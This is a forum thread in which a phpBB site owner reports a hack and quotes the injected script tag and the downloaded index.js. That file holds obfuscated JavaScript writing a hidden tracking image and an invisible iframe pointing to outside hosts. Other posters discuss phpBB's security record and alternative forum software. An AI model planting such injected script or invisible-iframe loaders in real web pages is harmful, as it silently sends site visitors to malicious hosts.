Forum Hacked!

[Brad101]

A new forum I’ve been developing/promoting was hacked very recently. I’m not sure how they did it, but I’m improving the forum’s security at the moment.

The hacker(s) inserted a single line of code in one critical file.

<script src="http://healingeczema.com/index.js"></script>

I downloaded ‘index.js’:

var var37458745 =
unescape(
"%3C%69%6D%67%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%77%77%77%2E%6D%61%69%6E%73%79%73%74%65"+
"%6D%73%69%74%65%2E%63%6F%6D%2F%63%6F%75%6E%74%65%72%2F%63%6F%75%6E%74%65%72%2E%70%68%70%27"+
"%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E"
);
document.write(var37458745);

document.write('<iframe src="http://baarish.co.uk/go.php" style=width:0;height:0;visibility:none;border:0"></iframe>');

Any one else had a forum/site hacked in a similar way?

 

[Elvie]

Twice I had phpBB on my server, and both times I was hacked.
Once every index.html file on the server was replaced. The second time, all my php blog applications were altered along with the board.
Is that the forum software you were running?

 

[Brad101]

Is that the forum software you were running?

Yep, phpBB!

I've just installed CrackerTracker Professional 2nd Edition (http://www.phpbbhacks.com/download/4359) + changing admin/cPanel passwords, gonna backup everything too.

I suspect the hacker(s) are exploiting some kind of security flaw.

 

[Uzzz]

yapp...had phpbb as well...and got hacked...by turkish warriors!...had a good laugh at their site though.

 

[Julez]

ive had PHPbb hacked as well - also OC commerce was hacked on my server as well :ak:

 

[DewChugr]

It's very important to keep phpbb updated to the very latest version. Hopefully the new version 3 be better in this area. You can probably get more info at their forum.

 

[Brad101]

:ak:

That reminds me, you forgot a useful smiley, Jon:

 

[Elvie]

I did have the latest version. I'll never put phpBB back on my server ever. I'll stick with programming my own. And maybe vBulletin - anyone ever have vBulletin hacked?

 

[CLKeenan]

Never had anything but pleasant experiences with vbulletin and their staff

 

[Nathan]

If you want a free forum software look at Simple machines Forum over phpBB. phpBB lost the plot in terms of security and even though they fixed it - more or less - mud sticks.

 

[CreationNation]

I will never run PHPBB on anything I use because it is hacked WAY too much. If you're serious about the site you are building a forum for, VBulletin is the way to go.

 

[Brad101]

Yep, it does seem vBulletin has the best reputation, by far. However, considering the amount of time and effort I’ve invested in phpBB, I’m reluctant to swap. The only downfall with phpBB, as far I can I tell, are the security issues. But, now I’ve installed CrackerTracker, I’m hoping there won’t be too many more in the future.

Additionally, the advanced URL mod (http://boards.phpbb-seo.com/phpbb-mod-rewrite-vf33/) available for phpBB is nothing short of superb as far as SEO’ing a forum is concerned. So, unless the forum gets hacked again, I will be definitely using phpBB in the future.

One new idea I have stems from the success of Markus’ Plentyoffish dating site. I’m thinking about combining a dating site and a forum – a community dating forum. Where members can IM each other, enter chat rooms, conduct polls, share thoughts in the forum, etc – and it will be totally free of course. But, it’s just an idea at the moment…

 

[John]

punBB is making a pretty good name for itself as far a free forum packages go.